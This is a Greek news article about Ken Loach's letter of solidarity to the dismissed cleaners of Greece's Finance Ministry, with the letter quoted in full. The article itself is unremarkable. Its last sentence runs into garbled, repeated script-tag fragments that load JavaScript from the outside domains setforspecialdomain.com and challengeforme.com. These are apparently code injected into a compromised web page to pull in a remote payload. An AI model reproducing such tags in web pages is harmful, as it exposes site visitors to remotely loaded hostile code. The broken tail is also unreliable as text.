Κινηματογράφος: Ο Κεν Λόουτς υπέρ των απολυμένων καθαριστριών του Υπουργείου Οικονομικών

Main_ken-loach-014

Μήνυμα αλληλεγγύης και συμπαράστασης του κορυφαίου άγγλου σκηνοθέτη.

Ταλαντούχος, αλλά πρωτίστως στρατευμένος, παρρησιαστικός και άκρως «πολιτικός» –ακόμη και στις εξωτερικά πιο ανάλαφρες ταινίες του– o 78χρονος άγγλος σκηνοθέτης Κεν Λόουτς έστειλε μήνυμα υποστήριξης και αλληλεγγύης στις, πασίγνωστες πια, απολυμένες καθαρίστριες του ελληνικού υπουργείου Οικονομικών! Το σύντομο, αλλά περιεκτικότατο μήνυμα του οξυδερκούς αυτού δεξιοτέχνη του (ακραιφνώς βρετανικού) κοινωνικού ρεαλισμού αναρτήθηκε στο μπλογκ των αγωνιζόμενων καθαριστριών και έχει ως εξής:
«Αγαπητές φίλες,
Άκουσα για την περίπτωσή σας από φίλους στην Αγγλία. Τι ιστορία, αλήθεια! Η δύναμη και η αποφασιστικότητά σας να αγωνιστείτε για αληθινές δουλειές με αξιοπρεπείς μισθούς εμπνέει. Όπως φαντάζομαι θα ξέρετε, έχουμε κι εδώ πολλές περιπτώσεις σαν τη δική σας. Η διαρκής πίεση για ιδιωτικοποίηση των δημόσιων παροχών καταστρέφει τις παροχές και φέρνει φτώχεια και ανασφάλεια στους εργαζόμενους. Η Ευρωπαϊκή Ένωση και οι μεγάλες εταιρείες, με την υποστήριξη των πολιτικών, συνιστούν φοβερό εχθρό. Κι εσείς, όμως, είστε φοβερές!
Όπως λέτε κι εσείς, πρέπει να στηρίζουμε ο ένας τον άλλον. Ο Πολ Λάβερτι, που γράφει τα σενάρια των φιλμ μας, συμπεριλαμβανομένης της ταινίας “Ψωμί και τριαντάφυλλα”, θα βρίσκεται για λίγες μέρες στην Αθήνα, τέλη Οκτώβρη (25-27/10). Και παρά το φορτωμένο πρόγραμμά του στο εκεί κινηματογραφικό φεστιβάλ, ελπίζει ότι θα μπορέσει να συναντηθεί μαζί σας τότε.
Εν τω μεταξύ, όλοι εδώ στέλνουμε τους χαιρετισμούς, την αλληλεγγύη και τις θερμότερες ευχές μας.
Ειλικρινά δικός σας,
Κεν Λόουτς»

Κατόπιν αυτών, δεν είναι να απορεί κανείς που ο Λόουτς είναι από τους ελάχιστους βρετανούς σκηνοθέτες που δεν έχουν ενδώσει στις σειρήνες του χολιγουντιανού σινεμά…___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >